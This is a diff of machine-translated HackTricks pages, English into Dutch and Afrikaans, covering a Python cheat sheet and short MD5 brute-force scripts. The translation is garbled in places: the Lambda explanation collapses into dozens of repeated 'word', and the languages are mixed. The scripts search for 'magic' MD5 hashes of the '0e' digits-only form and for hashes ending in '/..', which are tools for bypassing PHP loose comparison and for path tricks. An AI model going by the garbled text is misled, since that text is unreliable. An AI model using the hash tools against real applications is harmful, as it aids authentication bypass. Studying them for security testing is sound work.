* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)
* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.**
* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
* Als je je **bedrijf wilt adverteren in HackTricks** of **HackTricks wilt downloaden in PDF-formaat**, bekijk dan de [**ABONNEMENTSPAKKETTEN**](https://github.com/sponsors/carlospolop)!
* Koop de [**officiële PEASS & HackTricks merchandise**](https://peass.creator-spring.com)
* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), onze collectie exclusieve [**NFT's**](https://opensea.io/collection/the-peass-family)
* **Doe mee aan de** 💬 [**Discord-groep**](https://discord.gg/hRep4RUj7f) of de [**telegram-groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.**
* **Deel je hacktrucs door PR's in te dienen bij de** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github-repos.
</details>
<figure><img src="../../.gitbook/assets/image (3) (1) (1) (1) (1).png" alt=""><figcaption></figcaption></figure>
\
Use [**Trickest**](https://trickest.com/?utm\_campaign=hacktrics\&utm\_medium=banner\&utm\_source=hacktricks) to easily build and **automate workflows** powered by the world's **most advanced** community tools.\
Get Access Today:
Gebruik [**Trickest**](https://trickest.com/?utm\_campaign=hacktrics\&utm\_medium=banner\&utm\_source=hacktricks) om eenvoudig workflows te bouwen en te automatiseren met behulp van 's werelds meest geavanceerde communitytools.\
Krijg vandaag nog toegang:
{% embed url="https://trickest.com/?utm_campaign=hacktrics&utm_medium=banner&utm_source=hacktricks" %}
**Interesting pages to check:**
**Interessante pagina's om te bekijken:**
* [**Pyscript hacking tricks**](pyscript.md)
* [**Python deserializations**](../../pentesting-web/deserialization/#python)
* [**Tricks to bypass python sandboxes**](bypass-python-sandboxes/)
* [**Basic python web requests syntax**](web-requests.md)
* [**Basic python syntax and libraries**](basic-python.md)
* [**Pyscript hacktrucs**](pyscript.md)
* [**Python deserialisaties**](../../pentesting-web/deserialization/#python)
* [**Trucs om Python-sandboxes te omzeilen**](bypass-python-sandboxes/)
* [**Basis syntaxis voor Python-webverzoeken**](web-requests.md)
* [**Basis syntaxis en bibliotheken voor Python**](basic-python.md)
<figure><img src="../../.gitbook/assets/image (3) (1) (1) (1) (1).png" alt=""><figcaption></figcaption></figure>
\
Use [**Trickest**](https://trickest.com/?utm\_campaign=hacktrics\&utm\_medium=banner\&utm\_source=hacktricks) to easily build and **automate workflows** powered by the world's **most advanced** community tools.\
Get Access Today:
Gebruik [**Trickest**](https://trickest.com/?utm\_campaign=hacktrics\&utm\_medium=banner\&utm\_source=hacktricks) om eenvoudig workflows te bouwen en te automatiseren met behulp van 's werelds meest geavanceerde communitytools.\
Krijg vandaag nog toegang:
{% embed url="https://trickest.com/?utm_campaign=hacktrics&utm_medium=banner&utm_source=hacktricks" %}
<details>
<summary><strong>Learn AWS hacking from zero to hero with</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
<summary><strong>Leer AWS-hacking vanaf nul tot held met</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
Other ways to support HackTricks:
Andere manieren om HackTricks te ondersteunen:
* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)
* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.**
* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
* Als je je **bedrijf wilt adverteren in HackTricks** of **HackTricks wilt downloaden in PDF-formaat**, bekijk dan de [**ABONNEMENTSPAKKETTEN**](https://github.com/sponsors/carlospolop)!
* Koop de [**officiële PEASS & HackTricks merchandise**](https://peass.creator-spring.com)
* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), onze collectie exclusieve [**NFT's**](https://opensea.io/collection/the-peass-family)
* **Doe mee aan de** 💬 [**Discord-groep**](https://discord.gg/hRep4RUj7f) of de [**telegram-groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.**
* **Deel je hacktrucs door PR's in te dienen bij de** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github-repos.
</details>

314
generic-methodologies-and-resources/python/basic-python.md
View file

@ -1,37 +1,37 @@
# Basic Python
# Basiese Python
<details>
<summary><strong>Learn AWS hacking from zero to hero with</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
<summary><strong>Leer AWS-hacking van nul tot held met</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
Other ways to support HackTricks:
Ander maniere om HackTricks te ondersteun:
* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)
* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.**
* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
* As jy jou **maatskappy geadverteer wil sien in HackTricks** of **HackTricks in PDF wil aflaai**, kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
* Kry die [**amptelike PEASS & HackTricks swag**](https://peass.creator-spring.com)
* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family)
* **Sluit aan by die** 💬 [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.**
* **Deel jou hacktruuks deur PR's in te dien by die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github-opslag.
</details>
## Python Basics
## Python Basiese Beginsels
### Useful information
### Nuttige inligting
list(xrange()) == range() --> In python3 range is the xrange of python2 (it is not a list but a generator)\
The difference between a Tuple and a List is that the position of a value in a tuple gives it meaning but the lists are just ordered values. Tuples have structures but lists have an order.
list(xrange()) == range() --> In python3 is range die xrange van python2 (dit is nie 'n lys nie, maar 'n generator)\
Die verskil tussen 'n Tuple en 'n Lys is dat die posisie van 'n waarde in 'n tuple betekenis daaraan gee, maar die lyse is net geordende waardes. Tuples het strukture, maar lyse het 'n volgorde.
### Main operations
### Hoofhandelinge
To raise a number you use: 3\*\*2 (not 3^2)\
If you do 2/3 it returns 1 because you are dividing two ints (integers). If you want decimals you should divide floats (2.0/3.0).\
Om 'n getal te verhoog, gebruik jy: 3\*\*2 (nie 3^2 nie)\
As jy 2/3 doen, gee dit 1 terug omdat jy twee ints (heeltalle) deel. As jy desimale wil hê, moet jy floats deel (2.0/3.0).\
i >= j\
i <= j\
i == j\
i != j\
a and b\
a or b\
not a\
a en b\
a of b\
nie a\
float(a)\
int(a)\
str(d)\
@ -46,76 +46,74 @@ isinstance(1, int) = True\
"abcdef".contains("abc") = True\
"abc\n".strip() = "abc"\
"apbc".replace("p","") = "abc"\
dir(str) = List of all the available methods\
help(str) = Definition of the class str\
dir(str) = Lys van al die beskikbare metodes\
help(str) = Definisie van die klas str\
"a".upper() = "A"\
"A".lower() = "a"\
"abc".capitalize() = "Abc"\
sum(\[1,2,3]) = 6\
sorted(\[1,43,5,3,21,4])
**Join chars**\
**Voeg karakters bymekaar**\
3 \* a = aaa\
a + b = ab\
a + str(3) = a3\
\[1,2,3]+\[4,5]=\[1,2,3,4,5]
**Parts of a list**\
**Dele van 'n lys**\
abc\[0] = a\
'abc\[-1] = c\
'abc\[1:3] = bc from \[1] to \[2]\
'abc\[1:3] = bc vanaf \[1] tot \[2]\
"qwertyuiop"\[:-1] = 'qwertyuio'
**Comments**\
\# One line comment\
**Kommentaar**\
\# Eenreëelkommentaar\
"""\
Several lines comment\
Another one\
Verskeie reëls kommentaar\
Nog een\
"""
**Loops**
**Lusse**
```
if a:
#somethig
#somethig
elif b:
#something
#something
else:
#something
#something
while(a):
#comething
#comething
for i in range(0,100):
#something from 0 to 99
#something from 0 to 99
for letter in "hola":
#something with a letter in "hola"
#something with a letter in "hola"
```
### Tuples
t1 = (1,'2,'three')\
t2 = (5,6)\
t3 = t1 + t2 = (1, '2', 'three', 5, 6)\
(4,) = Singelton\
d = () empty tuple\
d += (4,) --> Adding into a tuple\
CANT! --> t1\[1] == 'New value'\
list(t2) = \[5,6] --> From tuple to list
d = () leë tuple\
d += (4,) --> Voeg by 'n tuple\
KAN NIE! --> t1\[1] == 'Nuwe waarde'\
list(t2) = \[5,6] --> Van tuple na lys
### List (array)
### Lys (array)
d = \[] empty\
d = \[] leë\
a = \[1,2,3]\
b = \[4,5]\
a + b = \[1,2,3,4,5]\
b.append(6) = \[4,5,6]\
tuple(a) = (1,2,3) --> From list to tuple
tuple(a) = (1,2,3) --> Van lys na tuple
### Dictionary
### Woordeskat
d = {} empty\
d = {} leë\
monthNumbers={1:Jan, 2: feb,feb:2}—> monthNumbers ->{1:Jan, 2: feb,feb:2}\
monthNumbers\[1] = Jan\
monthNumbers\[feb] = 2\
@ -124,218 +122,198 @@ monthNumbers.values() = \[Jan,feb,2]\
keys = \[k for k in monthNumbers]\
a={'9':9}\
monthNumbers.update(a) = {'9':9, 1:Jan, 2: feb,feb:2}\
mN = monthNumbers.copy() #Independent copy\
monthNumbers.get('key',0) #Check if key exists, Return value of monthNumbers\["key"] or 0 if it does not exists
mN = monthNumbers.copy() #Onafhanklike kopie\
monthNumbers.get('key',0) #Kyk of sleutel bestaan, Gee waarde van monthNumbers\["key"] of 0 as dit nie bestaan nie
### Set
### Stel
In sets there are no repetitions\
In stelle is daar geen herhalings nie\
myset = set(\['a', 'b']) = {'a', 'b'}\
myset.add('c') = {'a', 'b', 'c'}\
myset.add('a') = {'a', 'b', 'c'} #No repetitions\
myset.add('a') = {'a', 'b', 'c'} #Geen herhalings\
myset.update(\[1,2,3]) = set(\['a', 1, 2, 'b', 'c', 3])\
myset.discard(10) #If present, remove it, if not, nothing\
myset.remove(10) #If present remove it, if not, rise exception\
myset.discard(10) #As teenwoordig, verwyder dit, as nie, niks\
myset.remove(10) #As teenwoordig, verwyder dit, as nie, gooi 'n uitsondering\
myset2 = set(\[1, 2, 3, 4])\
myset.union(myset2) #Values it myset OR myset2\
myset.intersection(myset2) #Values in myset AND myset2\
myset.difference(myset2) #Values in myset but not in myset2\
myset.symmetric\_difference(myset2) #Values that are not in myset AND myset2 (not in both)\
myset.pop() #Get the first element of the set and remove it\
myset.intersection\_update(myset2) #myset = Elements in both myset and myset2\
myset.difference\_update(myset2) #myset = Elements in myset but not in myset2\
myset.symmetric\_difference\_update(myset2) #myset = Elements that are not in both
myset.union(myset2) #Waardes in myset OF myset2\
myset.intersection(myset2) #Waardes in myset EN myset2\
myset.difference(myset2) #Waardes in myset maar nie in myset2\
myset.symmetric\_difference(myset2) #Waardes wat nie in myset EN myset2 is (nie in beide nie)\
myset.pop() #Kry die eerste element van die stel en verwyder dit\
myset.intersection\_update(myset2) #myset = Elemente in beide myset en myset2\
myset.difference\_update(myset2) #myset = Elemente in myset maar nie in myset2\
myset.symmetric\_difference\_update(myset2) #myset = Elemente wat nie in beide is nie
### Classes
The method in \_\_It\_\_ will be the one used by sort to compare if an object of this class is bigger than other
### Klasse
Die metode in \_\_It\_\_ sal gebruik word deur sort om te vergelyk of 'n objek van hierdie klas groter is as 'n ander
```python
class Person(name):
def __init__(self,name):
self.name= name
self.lastName = name.split( )[-1]
self.birthday = None
def __It__(self, other):
if self.lastName == other.lastName:
return self.name < other.name
return self.lastName < other.lastName #Return True if the lastname is smaller
def __init__(self,name):
self.name= name
self.lastName = name.split( )[-1]
self.birthday = None
def __It__(self, other):
if self.lastName == other.lastName:
return self.name < other.name
return self.lastName < other.lastName #Return True if the lastname is smaller
def setBirthday(self, month, day. year):
self.birthday = date tame.date(year,month,day)
def getAge(self):
return (date time.date.today() - self.birthday).days
def setBirthday(self, month, day. year):
self.birthday = date tame.date(year,month,day)
def getAge(self):
return (date time.date.today() - self.birthday).days
class MITPerson(Person):
nextIdNum = 0 # Attribute of the Class
def __init__(self, name):
Person.__init__(self,name)
self.idNum = MITPerson.nextIdNum —> Accedemos al atributo de la clase
MITPerson.nextIdNum += 1 #Attribute of the class +1
nextIdNum = 0 # Attribute of the Class
def __init__(self, name):
Person.__init__(self,name)
self.idNum = MITPerson.nextIdNum —> Accedemos al atributo de la clase
MITPerson.nextIdNum += 1 #Attribute of the class +1
def __it__(self, other):
return self.idNum < other.idNum
def __it__(self, other):
return self.idNum < other.idNum
```
### map, zip, filter, lambda, sorted en eenregelige oplossingen
### map, zip, filter, lambda, sorted and one-liners
**Map** is like: \[f(x) for x in iterable] --> map(tutple,\[a,b]) = \[(1,2,3),(4,5)]\
**Map** is soos: \[f(x) vir x in iterable] --> map(tutple,\[a,b]) = \[(1,2,3),(4,5)]\
m = map(lambda x: x % 3 == 0, \[1, 2, 3, 4, 5, 6, 7, 8, 9]) --> \[False, False, True, False, False, True, False, False, True]
**zip** stops when the shorter of foo or bar stops:
**zip** stop wanneer die kortste van foo of bar stop:
```
for f, b in zip(foo, bar):
print(f, b)
print(f, b)
```
**Lambda** is used to define a function\
(lambda x,y: x+y)(5,3) = 8 --> Use lambda as simple **function**\
**sorted**(range(-5,6), key=lambda x: x\*\* 2) = \[0, -1, 1, -2, 2, -3, 3, -4, 4, -5, 5] --> Use lambda to sort a list\
m = **filter**(lambda x: x % 3 == 0, \[1, 2, 3, 4, 5, 6, 7, 8, 9]) = \[3, 6, 9] --> Use lambda to filter\
**reduce** (lambda x,y: x\*y, \[1,2,3,4]) = 24
**Lambda** word word word word word word word word word word word word word word word word word word word word word word word word word word word word word word word word word word word word word word word word word word word word word word word word word word word word word word word word word word word word word word word word word word word word word word word word word word word word word word word word word word word word word word word word word word word word word word word word word word word word
```
def make_adder(n):
return lambda x: x+n
return lambda x: x+n
plus3 = make_adder(3)
plus3(4) = 7 # 3 + 4 = 7
class Car:
crash = lambda self: print('Boom!')
crash = lambda self: print('Boom!')
my_car = Car(); my_car.crash() = 'Boom!'
```
mult1 = \[x vir x in \[1, 2, 3, 4, 5, 6, 7, 8, 9] as x%3 == 0 ]
mult1 = \[x for x in \[1, 2, 3, 4, 5, 6, 7, 8, 9] if x%3 == 0 ]
### Exceptions
### Uitsonderings
```
def divide(x,y):
try:
result = x/y
except ZeroDivisionError, e:
print “division by zero!” + str(e)
except TypeError:
divide(int(x),int(y))
else:
print “result i”, result
finally
print “executing finally clause in any case”
def divide(x,y):
try:
result = x/y
except ZeroDivisionError, e:
print “division by zero!” + str(e)
except TypeError:
divide(int(x),int(y))
else:
print “result i”, result
finally
print “executing finally clause in any case”
```
### Assert()
If the condition is false the string will be printed in the screen
As die voorwaarde vals is, sal die string op die skerm gedruk word.
```
def avg(grades, weights):
assert not len(grades) == 0, 'no grades data'
assert len(grades) == 'wrong number grades'
assert not len(grades) == 0, 'no grades data'
assert len(grades) == 'wrong number grades'
```
### Opwekkers, opbrengs
### Generators, yield
A generator, instead of returning something, it "yields" something. When you access it, it will "return" the first value generated, then, you can access it again and it will return the next value generated. So, all the values are not generated at the same time and a lot of memory could be saved using this instead of a list with all the values.
'n Opwekker, in plaas van om iets terug te gee, "lewer" iets op. Wanneer jy dit toegang gee, sal dit die eerste gegenereerde waarde "teruggee", dan kan jy dit weer toegang gee en dit sal die volgende gegenereerde waarde teruggee. So, al die waardes word nie op dieselfde tyd gegenereer nie en baie geheue kan bespaar word deur dit te gebruik in plaas van 'n lys met al die waardes.
```
def myGen(n):
yield n
yield n + 1
yield n
yield n + 1
```
g = myGen(6) --> 6\
next(g) --> 7\
next(g) --> Error
next(g) --> Fout
### Regular Expresions
### Reëlmatige Uitdrukkings
import re\
re.search("\w","hola").group() = "h"\
re.findall("\w","hola") = \['h', 'o', 'l', 'a']\
re.findall("\w+(la)","hola caracola") = \['la', 'la']
**Special meanings:**\
. --> Everything\
**Spesiale betekenisse:**\
. --> Alles\
\w --> \[a-zA-Z0-9\_]\
\d --> Number\
\s --> WhiteSpace char\[ \n\r\t\f]\
\S --> Non-whitespace char\
^ --> Starts with\
$ --> Ends with\
\+ --> One or more\
\* --> 0 or more\
? --> 0 or 1 occurrences
\d --> Nommer\
\s --> Spasie karakter\[ \n\r\t\f]\
\S --> Nie-spasie karakter\
^ --> Begin met\
$ --> Eindig met\
\+ --> Een of meer\
\* --> 0 of meer\
? --> 0 of 1 voorkomste
**Options:**\
**Opsies:**\
re.search(pat,str,re.IGNORECASE)\
IGNORECASE\
DOTALL --> Allow dot to match newline\
MULTILINE --> Allow ^ and $ to match in different lines
DOTALL --> Laat punt om nuwe lyn te pas\
MULTILINE --> Laat ^ en $ om in verskillende lyne te pas
re.findall("<.\*>", "\<b>foo\</b>and\<i>so on\</i>") = \['\<b>foo\</b>and\<i>so on\</i>']\
re.findall("<.\*?>", "\<b>foo\</b>and\<i>so on\</i>") = \['\<b>', '\</b>', '\<i>', '\</i>']
IterTools\
**product**\
from **itertools** import product --> Generates combinations between 1 or more lists, perhaps repeating values, cartesian product (distributive property)\
from **itertools** import product --> Genereer kombinasies tussen 1 of meer lysse, dalk herhalende waardes, kartesiese produk (verdelings eienskap)\
print list(**product**(\[1,2,3],\[3,4])) = \[(1, 3), (1, 4), (2, 3), (2, 4), (3, 3), (3, 4)]\
print list(**product**(\[1,2,3],repeat = 2)) = \[(1, 1), (1, 2), (1, 3), (2, 1), (2, 2), (2, 3), (3, 1), (3, 2), (3, 3)]
**permutations**\
from **itertools** import **permutations** --> Generates combinations of all characters in every position\
print list(permutations(\['1','2','3'])) = \[('1', '2', '3'), ('1', '3', '2'), ('2', '1', '3'),... Every posible combination\
print(list(permutations('123',2))) = \[('1', '2'), ('1', '3'), ('2', '1'), ('2', '3'), ('3', '1'), ('3', '2')] Every possible combination of length 2
from **itertools** import **permutations** --> Genereer kombinasies van alle karakters op elke posisie\
print list(permutations(\['1','2','3'])) = \[('1', '2', '3'), ('1', '3', '2'), ('2', '1', '3'),... Elke moontlike kombinasie\
print(list(permutations('123',2))) = \[('1', '2'), ('1', '3'), ('2', '1'), ('2', '3'), ('3', '1'), ('3', '2')] Elke moontlike kombinasie van lengte 2
**combinations**\
from itertools import **combinations** --> Generates all possible combinations without repeating characters (if "ab" existing, doesn't generate "ba")\
from itertools import **combinations** --> Genereer alle moontlike kombinasies sonder om karakters te herhaal (as "ab" bestaan, genereer dit nie "ba")\
print(list(**combinations**('123',2))) --> \[('1', '2'), ('1', '3'), ('2', '3')]
**combinations\_with\_replacement**\
from itertools import **combinations\_with\_replacement** --> Generates all possible combinations from the char onwards(for example, the 3rd is mixed from the 3rd onwards but not with the 2nd o first)\
from itertools import **combinations\_with\_replacement** --> Genereer alle moontlike kombinasies vanaf die karakter voort (byvoorbeeld, die 3de is gemeng vanaf die 3de voort maar nie met die 2de of eerste nie)\
print(list(**combinations\_with\_replacement**('1133',2))) = \[('1', '1'), ('1', '1'), ('1', '3'), ('1', '3'), ('1', '1'), ('1', '3'), ('1', '3'), ('3', '3'), ('3', '3'), ('3', '3')]
### Decorators
Decorator that size the time that a function needs to be executed (from [here](https://towardsdatascience.com/decorating-functions-in-python-619cbbe82c74)):
### Versierders
Versierder wat die tyd meet wat 'n funksie neem om uitgevoer te word (vanaf [hier](https://towardsdatascience.com/decorating-functions-in-python-619cbbe82c74)):
```python
from functools import wraps
import time
def timeme(func):
@wraps(func)
def wrapper(*args, **kwargs):
print("Let's call our decorated function")
start = time.time()
result = func(*args, **kwargs)
print('Execution time: {} seconds'.format(time.time() - start))
return result
return wrapper
@wraps(func)
def wrapper(*args, **kwargs):
print("Let's call our decorated function")
start = time.time()
result = func(*args, **kwargs)
print('Execution time: {} seconds'.format(time.time() - start))
return result
return wrapper
@timeme
def decorated_func():
print("Decorated func!")
print("Decorated func!")
```
If you run it, you will see something like the following:
As jy dit uitvoer, sal jy iets soos die volgende sien:
```
Let's call our decorated function
Decorated func!
Execution time: 4.792213439941406e-05 seconds
```
<details>
<summary><strong>Learn AWS hacking from zero to hero with</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
<summary><strong>Leer AWS-hacking van nul tot held met</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
Other ways to support HackTricks:
Ander maniere om HackTricks te ondersteun:
* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)
* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.**
* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
* As jy jou **maatskappy geadverteer wil sien in HackTricks** of **HackTricks in PDF wil aflaai**, kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
* Kry die [**amptelike PEASS & HackTricks swag**](https://peass.creator-spring.com)
* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family)
* **Sluit aan by die** 💬 [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.**
* **Deel jou hacking-truuks deur PR's in te dien by die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github-opslagplekke.
</details>

87
generic-methodologies-and-resources/python/bruteforce-hash-few-chars.md
View file

@ -1,32 +1,28 @@
<details>
<summary><strong>Learn AWS hacking from zero to hero with</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
<summary><strong>Leer AWS-hacking van nul tot held met</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
Other ways to support HackTricks:
Ander maniere om HackTricks te ondersteun:
* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)
* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.**
* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
* As jy jou **maatskappy geadverteer wil sien in HackTricks** of **HackTricks in PDF wil aflaai**, kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
* Kry die [**amptelike PEASS & HackTricks swag**](https://peass.creator-spring.com)
* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family)
* **Sluit aan by die** 💬 [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.**
* **Deel jou hacking-truuks deur PR's in te dien by die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github-opslag.
</details>
```python
import hashlib
target = '2f2e2e' #/..
candidate = 0
while True:
plaintext = str(candidate)
hash = hashlib.md5(plaintext.encode('ascii')).hexdigest()
if hash[-1*(len(target)):] == target: #End in target
print('plaintext:"' + plaintext + '", md5:' + hash)
break
candidate = candidate + 1
plaintext = str(candidate)
hash = hashlib.md5(plaintext.encode('ascii')).hexdigest()
if hash[-1*(len(target)):] == target: #End in target
print('plaintext:"' + plaintext + '", md5:' + hash)
break
candidate = candidate + 1
```
```python
@ -36,50 +32,45 @@ from multiprocessing import Process, Queue, cpu_count
def loose_comparison(queue, num):
target = '0e'
plaintext = f"a_prefix{str(num)}a_suffix"
hash = hashlib.md5(plaintext.encode('ascii')).hexdigest()
target = '0e'
plaintext = f"a_prefix{str(num)}a_suffix"
hash = hashlib.md5(plaintext.encode('ascii')).hexdigest()
if hash[:len(target)] == target and not any(x in "abcdef" for x in hash[2:]):
print('plaintext: ' + plaintext + ', md5: ' + hash)
queue.put("done") # triggers program exit
if hash[:len(target)] == target and not any(x in "abcdef" for x in hash[2:]):
print('plaintext: ' + plaintext + ', md5: ' + hash)
queue.put("done") # triggers program exit
def worker(queue, thread_i, threads):
for num in range(thread_i, 100**50, threads):
loose_comparison(queue, num)
for num in range(thread_i, 100**50, threads):
loose_comparison(queue, num)
def main():
procs = []
queue = Queue()
threads = cpu_count() # 2
procs = []
queue = Queue()
threads = cpu_count() # 2
for thread_i in range(threads):
proc = Process(target=worker, args=(queue, thread_i, threads ))
proc.daemon = True # kill all subprocess when main process exits.
procs.append(proc)
proc.start()
for thread_i in range(threads):
proc = Process(target=worker, args=(queue, thread_i, threads ))
proc.daemon = True # kill all subprocess when main process exits.
procs.append(proc)
proc.start()
while queue.empty(): # exits when a subprocess is done
pass
return 0
while queue.empty(): # exits when a subprocess is done
pass
return 0
main()
```
<details>
<summary><strong>Learn AWS hacking from zero to hero with</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
<summary><strong>Leer AWS-hacking van nul tot held met</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
Other ways to support HackTricks:
Ander maniere om HackTricks te ondersteun:
* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)
* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.**
* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
* As jy jou **maatskappy geadverteer wil sien in HackTricks** of **HackTricks in PDF wil aflaai**, kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
* Kry die [**amptelike PEASS & HackTricks swag**](https://peass.creator-spring.com)
* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family)
* **Sluit aan by die** 💬 [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.**
* **Deel jou hacking-truuks deur PR's in te dien by die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github-opslag.
</details>

1743
